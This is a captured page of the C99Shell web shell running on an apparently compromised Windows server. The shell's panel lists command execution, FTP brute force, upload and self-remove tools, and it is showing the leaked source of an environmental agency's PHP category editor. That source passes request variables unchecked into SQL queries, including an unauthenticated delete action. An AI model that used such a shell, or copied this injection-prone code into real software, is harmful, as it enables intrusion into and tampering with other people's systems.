!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\Extranet\phpscripts\   drwxrwxrwx
Free 4.08 GB of 39.52 GB (10.32%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     cate.php (10.72 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<html>
<head>
<title>Editor de Categorias, Sitio del DAMA</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
select {  font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; color: #333333; background-color: #FDFEF1}
input {  font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; color: #333333; background-color: #FDFEF1}
a {  text-decoration: none}
a:hover {  text-decoration: underline}
-->
</style>
</head>
<?php
$ocho 
= isset($acc8);
if (
$ocho == true and $acc8 == 8) {
include(
'conect/conect.php');
$query ="UPDATE cate SET carpeta_template='$templa',tema_desc='$add' WHERE id='$id2'";
$result mysql_query($query,$db);
}
$cinco = isset($acc3);
if (
$cinco == true and $acc3 == 3) {
include(
'conect/conect.php');
$query ="DELETE FROM cate WHERE id='$id'";
$result mysql_query($query,$db);
}


$cuatro = isset($acc2);
if (
$cuatro == true and $acc2 == 2) {
$kos strlen($last);

$kosi $kos 2;
$numero substr($last$kosi2);
$numero $numero 1;
$lennu strlen($numero);
if (
$lennu == 1) {
$numet "0" $numero;
}else{
$numet $numero;
}
$numet $catparent $numet;
include(
'conect/conect.php');

$query ="INSERT INTO cate VALUES('','$numet','$add','$templa')";
$result mysql_query($query,$db);


//echo "$numet";
}

?>
<body bgcolor="#FFFFFF" text="#000000" topmargin="0" link="#0000FF" vlink="#0000FF" alink="#0000FF">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
  <tr>
    <td width="33%">&nbsp;</td>
    <td width="34%">
      <table width="650" border="0" cellspacing="0" cellpadding="6">
        <tr> 
          <td colspan="2"><img src="sitebanner.gif" width="543" height="104"></td>
        </tr>
        <tr> 
          <td width="50%" valign="top"> 
            <div align="center"><font face="Verdana, Arial, Helvetica, sans-serif" size="3"><b>Editor 
              de Categorias<br>
              </b></font><font face="Verdana, Arial, Helvetica, sans-serif" size="1">Adici&oacute;n 
              y elminiaci&oacute;n del &aacute;rbol de categorias</font><font face="Verdana, Arial, Helvetica, sans-serif" size="3"><b> 
              </b></font></div>
          </td>
          <td width="50%"> 
            <form name="form1" method="post" action="reqcate.php">
              <div align="center"><font face="Verdana, Arial, Helvetica, sans-serif" size="1"><img src="plus.gif" width="12" height="12"></font> 
                <font face="Verdana, Arial, Helvetica, sans-serif" size="2"><b>Ver...</b> 
                <input type="hidden" name="acc" value="1">
                <select name="cual">
                  <option value="1.">Sub. Sectorial</option>
                  <option value="2.">Sub. Ecosistemas</option>
                  <option value="3.">Sub. Jur&iacute;dica</option>
                  <option value="4.">Sub. Administrativa</option>
                  <option value="5.">Sub. Vivienda</option>
                  <option value="6.">Of. Planeaci&oacute;n</option>
                  <option value="7.">Of. Control Interno</option>
                </select>
                <input type="submit" name="Submit" value="Ver">
                <input name="user" type="hidden" id="user" value="<?php echo $user?>">
                </font></div>
            </form>
          </td>
        </tr>
        <tr> 
          <td colspan="2"> 
            <table width="100%" border="0" cellspacing="0" cellpadding="3">
              <tr> 
                <td colspan="2"> 
                  
                </td>
              </tr>
              <tr> 
                <td width="50%" valign="top"> 
                  <table width="100%" border="1" cellspacing="0" cellpadding="8" bordercolor="#999999" bgcolor="#D5EAEA">
                    <tr>
                      <td><font face="Verdana, Arial, Helvetica, sans-serif" size="1">Seleccione 
                        de este &aacute;rbol de categorias, aquella en la que 
                        quiere agregar o borrar una subcategoria.<br>
                        -----------------------------------------------<br>
                        </font>
<?php
// Consulta de cuales son los permisos asignados a cada usuarios

include('conect/conect.php');
$consul "SELECT *
FROM perms where usr='
$user'";
$result mysql_query($consul,$db);
$num_filas mysql_num_rows($result);

if (
$user == "EMAIL") {
    
$milito = isset($acc);
    if (
$milito == true) {
    
$patron $cual;
    }else{
    
$patron "1.";
    }
}else{
    
$myrow mysql_fetch_array($result);
    
$thm $myrow["id_apl"];
    
$consul "SELECT *
    FROM cate where id='
$thm'";
    
$result mysql_query($consul,$db);
    
$num_filas mysql_num_rows($result);
    
$myrow mysql_fetch_array($result);
    
$patron $myrow["tema_id"];
}

include(
'conect/conect.php');
$consul "SELECT *
FROM cate where tema_id like '
$patron%'"
" order by tema_id";
$result mysql_query($consul,$db);
$num_filas mysql_num_rows($result);
?>


                        <table width="100%" border="1" cellspacing="0" cellpadding="14" bordercolor="#B7DBDB">
                          <tr>
                            <td bgcolor="#FFFFFF"> 
                              <?php
                            
while ($myrow mysql_fetch_array($result))
                            {
                            
$tema $myrow["tema_desc"];
                            
$codigo $myrow["tema_id"];
                            
$id $myrow["id"];
                            
$largo strlen($codigo);
                            if (
$largo == or $largo == 3) {
                            echo 
"<font face=\"Verdana, Arial, Helvetica, sans-serif\" size=\"1\"><img src=\"plus.gif\" width=\"12\" height=\"12\"> 
                              <b><a href=\"reqcate.php?acc=1&cual=
$patron&shw=$codigo&user=$user\">$tema</a></b><br></font>";
                            }
                            if (
$largo == or $largo == 5) {
                            echo 
"<font face=\"Verdana, Arial, Helvetica, sans-serif\" size=\"1\"><img src=\"int.gif\" width=\"12\" height=\"12\"><img src=\"int1.gif\" width=\"12\" height=\"12\"> 
                              <a href=\"reqcate.php?acc=1&cual=
$patron&shw=$codigo&user=$user\">$tema</a><br></font>";
                            }
                            if (
$largo >= 7) {
                            echo 
"<font face=\"Verdana, Arial, Helvetica, sans-serif\" size=\"1\"><img src=\"int.gif\" width=\"12\" height=\"12\"><img src=\"int.gif\" width=\"12\" height=\"12\"><img src=\"int1.gif\" width=\"12\" height=\"12\"><a href=\"reqcate.php?acc=1&cual=$patron&shw=$codigo&user=$user\"> 
                              
$tema</a><br></font>";
                            }
                            }
                            
                            
?>
                            </td>
                          </tr>
                        </table>
                      </td>
                    </tr>
                  </table>
                  
                </td>
                <td width="50%" valign="top"> 
                  <table width="100%" border="1" cellspacing="0" cellpadding="8" bordercolor="#999999">
                    <tr>
                      <td bgcolor="#D7D7D7" valign="top">
                      <?php
$milito 
= isset($shw);
if (
$milito == true) {
$patron $shw;
}
$mar strlen($patron);
$mar $mar 1;
$mar1 $mar 1;

include(
'conect/conect.php');
$consul "SELECT *
FROM cate where tema_id like '
$patron%'"
" order by tema_id";
$result mysql_query($consul,$db);
$num_filas mysql_num_rows($result);
$myrow mysql_fetch_array($result);
                            
$tema $myrow["tema_desc"];
                            
$codigoparent $myrow["tema_id"];
?> 
                        <p><font face="Verdana, Arial, Helvetica, sans-serif" size="1"><b>Categoria:</b></font><font face="Verdana, Arial, Helvetica, sans-serif"><br>
                          <font size="1"><img src="del.gif" width="12" height="12"></font> 
                          <b><font size="2"><?php echo $tema?></font></b><br>
                          <font size="1">Subcategorias presentes; en <?php echo $patron?><br>
                          --------------------------------------------<br>
                          </font></font> 
                          <?php
                            
while ($myrow mysql_fetch_array($result))
                            {
                            
$tema $myrow["tema_desc"];
                            
$codigo $myrow["tema_id"];
                            
$id $myrow["id"];
                            
$templa $myrow["carpeta_template"];
                            
$largo strlen($codigo);
                            if (
$largo == $mar or $largo == $mar1) {
                            echo 
"<font face=\"Verdana, Arial, Helvetica, sans-serif\" size=\"1\"><img src=\"plus.gif\" width=\"12\" height=\"12\"> 
                          
$tema (<a href=\"reqcate.php?acc3=3&id=$id&user=$user\">x</a>)(<a href=\"reqcateedi.php?id=$id&user=$user\">e</a>)<br>";
                          
$last $codigo;
                          }}
                            
?>
                        </p>
                        <font face="Verdana, Arial, Helvetica, sans-serif" size="1"><img src="plus.gif" width="12" height="12"> 
                        A&ntilde;adir una nueva subcategoria</font><br>
                        <font face="Verdana, Arial, Helvetica, sans-serif"><font size="1">--------------------------------------------</font></font> 
                        <form name="form2" method="post" action="">
                          <p><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Require:</font> 
                            <input name="templa" type="text" id="templa">
                          </p>
                          <p> 
                            <input type="text" name="add">
                            <font face="Verdana, Arial, Helvetica, sans-serif" size="2"> 
                            <input type="hidden" name="acc2" value="2">
                            <input type="hidden" name="catparent" value="<?php echo $patron?>">
                            <input type="hidden" name="last" value="<?php echo $last?>">
                            <input name="user" type="hidden" id="user" value="<?php echo $user?>">
                            </font> 
                            <input type="submit" name="Submit2" value="Agregar">
                          </p>
                        </form>
                        
                      </td>
                    </tr>
                  </table>
                </td>
              </tr>
            </table>
            
          </td>
        </tr>
        <tr> 
          <td colspan="2"><img src="footer.gif" width="543" height="36"></td>
        </tr>
        <tr> 
          <td colspan="2"> 
            <div align="center"><font face="Verdana, Arial, Helvetica, sans-serif" size="1">Departamento 
              T&eacute;cnico Administrativo del Medio Ambiente DAMA<br>
              Sistema de Informaci&oacute;n Ambiental, SIA-DAMA<br>
              M&oacute;dulo Interno de Administraci&oacute;n.</font></div>
          </td>
        </tr>
      </table>
    </td>
    <td width="33%">&nbsp;</td>
  </tr>
</table>
</body>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.078 ]--